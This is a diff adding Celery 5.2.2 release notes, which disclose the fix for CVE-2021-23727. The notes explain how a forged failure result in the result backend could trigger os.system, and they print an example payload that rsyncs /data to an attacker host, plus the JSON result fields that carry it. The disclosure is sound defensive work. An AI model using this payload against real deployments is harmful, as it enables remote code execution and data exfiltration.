@@ -8,6 +8,44 @@ This document contains change notes for bugfix & new features
88in the & 5.2.x series, please see :ref: `whatsnew-5.2 ` for
99an overview of what's new in Celery 5.2.
1010
11+ .. _version-5.2.2 :
12+
13+ 5.2.2
14+ =====
15+
16+ :release-date: 2021-12-26 16:30 P.M UTC+2:00
17+ :release-by: Omer Katz
18+
19+ - Various documentation fixes.
20+ - Fix CVE-2021-23727 (Stored Command Injection security vulnerability).
21+
22+ When a task fails, the failure information is serialized in the backend.
23+ In some cases, the exception class is only importable from the
24+ consumer's code base. In this case, we reconstruct the exception class
25+ so that we can re-raise the error on the process which queried the
26+ task's result. This was introduced in #4836.
27+ If the recreated exception type isn't an exception, this is a security issue.
28+ Without the condition included in this patch, an attacker could inject a remote code execution instruction such as:
29+ ``os.system("rsync /data attacker@192.168.56.100:~/data") ``
30+ by setting the task's result to a failure in the result backend with the os,
31+ the system function as the exception type and the payload ``rsync /data attacker@192.168.56.100:~/data `` as the exception arguments like so:
32+
33+ .. code-block :: python
34+
35+ {
36+ " exc_module" " os"
37+ ' exc_type' " system"
38+ " exc_message" " rsync /data attacker@192.168.56.100:~/data"
39+ }
40+
41+
42+ the producer delayed a task which runs long enough for the
43+ attacker to change the result mid-flight, and the producer has
44+ polled for the task's result.
45+ The attacker would also have to gain access to the result backend.
46+ The severity of this security vulnerability is low, but we still
47+ recommend upgrading.
48+
1149
1250.. _version-5.2.1 :
1351
0 commit comments